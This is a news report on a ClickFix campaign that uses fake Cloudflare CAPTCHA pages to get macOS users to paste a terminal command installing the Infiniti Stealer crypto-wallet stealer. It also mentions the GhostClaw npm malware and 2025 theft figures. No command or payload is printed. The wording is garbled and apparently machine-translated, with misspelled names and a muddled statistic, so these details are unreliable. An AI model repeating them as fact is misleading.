Cryptocurrency users are facing a new security threat via fake Cloudflare CAPTCHA pages. The attack installs a new information-stealing software called Infiniti Stealer designed to exfiltrate cryptocurrency wallet data from macOS systems.
This means that any developer or crypto user with a MacBook or Mac desktop computer is at risk of being infected with this malware.
The ClickFix attack begins infecting the macOS system
This campaign was discovered by security researchers from Malwarebytes. The malware’s launchpad was later revealed, revealing the name Infinite Stealer.
The information theft tool is delivered through the ClickFix attack. The ClickFix attack is classified as a social engineering attack. It tricks users into running a malicious command themselves. Instead of hacking your computer directly, it convinces you to do it for it.
The attack starts with a fake CAPTCHA page from update-check(.)com. The page looks like Cloudflare’s human verification page, but it’s not. After clicking on the fake CAPTCHA, the user is prompted to open the terminal and paste a command.
It’s not verification. It is a hidden installer that downloads and runs malware on the user’s computer.
The attack works because the user executes the command. It bypasses traditional defenses because there is no exploitation involved.
Once the command is executed, it connects to a remote server controlled by the attacker who quietly downloads and installs Infiniti Stealer on your Mac. No pop-ups, no warnings, just silent installation.
Security researchers say this malware is difficult to analyze and detect because it was compiled into a native macOS binary. It is not just a Python script that can be easily read and understood.
the Malware It’s designed to steal sensitive data from Macs, including cryptocurrency wallet data, credentials from browsers and macOS keychains, plaintext secrets in developer files, and even screenshots captured during execution.
It also checks if it is running in an analysis environment to avoid detection, and sends the stolen data to the attacker’s server. Telegram notifications are sent to the attacker when data exfiltration is complete, and the captured credentials are queued for server-side password cracking.
ClickFix attacks are common on Windows, but now hackers are adapting them to Apple devices. MacOS systems are no longer safe from malware. Crypto users should be careful when browsing the web and should never paste commands into the terminal from untrusted sources.
The settlement of personal cryptocurrency wallets is rising sharply
This is not the first sophisticated attack targeting cryptocurrency users on macOS. Cryptopolitan reported in March about GhostClawa new malware for MacOS that steals private keys, wallet access, and other sensitive data.
The malware was embedded in npm, a popular package manager for JavaScript. It was introduced as a true OpenClaw tool but instead launched a multi-stage attack. A total of 178 developers downloaded the malicious package before it was removed from the registry.
A total of $3.4 billion was stolen from the cryptocurrency industry in 2025.
“Personal wallet breaches have grown significantly, increasing from just 7.3% of the total value stolen in 2022 to 44% in 2024,” according to a new report. a report From blockchain security company Chainalogy.
The amount of hacks on personal wallets could have reached 37% in 2025 if it were not for the huge impact of the Bybit attack.
